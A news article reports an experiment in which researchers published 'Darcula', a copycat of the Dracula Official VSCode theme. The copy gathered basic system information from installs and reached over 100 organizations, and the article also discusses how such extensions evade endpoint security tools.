A recent discovery by a group of Israeli researchers has shed light on the presence of malicious Visual Studio Code (VSCode) extensions within the VSCode Marketplace. The researchers were able to infiltrate over 100 organizations by introducing risky code into a copy of the popular ‘Dracula Official’ theme, a theme with millions of installs.

Visual Studio Code, developed by Microsoft, is a widely used source code editor among professional software developers globally. The Visual Studio Code Marketplace, operated by Microsoft, offers a variety of extensions that enhance the functionality of the IDE and provide users with customization options.

Past reports have highlighted security vulnerabilities within the VSCode ecosystem, including issues related to extension and publisher impersonation, as well as extensions that have been found to steal developer authentication tokens. There have also been instances of confirmed malicious extensions circulating in the marketplace.

In a recent experiment conducted by researchers Amit Assaraf, Itay Kruk, and Idan Dardikman, a fake extension named ‘Darcula’ was created to mimic the popular ‘Dracula Official’ theme. The legitimate Dracula theme boasts over 7 million installs on the VSCode Marketplace and is favored by developers for its visually appealing dark mode with a high-contrast color palette, designed to reduce eye strain during long coding sessions.

The ‘Darcula’ extension, hosted on the VSCode Marketplace under a matching domain ‘darculatheme.com,’ utilized the original code from the Dracula theme while incorporating additional scripts to gather system information. This collected data included details such as the hostname, number of installed extensions, device’s domain name, and operating system platform, which were then transmitted to a remote server via an HTTPS POST request.

One concerning aspect highlighted by the researchers is that the malicious code embedded in these extensions often goes undetected by traditional endpoint security tools (EDRs). This is due to the nature of VSCode as a system that reads multiple files, executes commands, and creates child processes, making it challenging for EDRs to identify suspicious activities.

As the VSCode Marketplace continues to host thousands of extensions with millions of installs, the need for enhanced security measures to prevent the proliferation of malicious extensions remains a pressing concern for both developers and organizations utilizing the platform.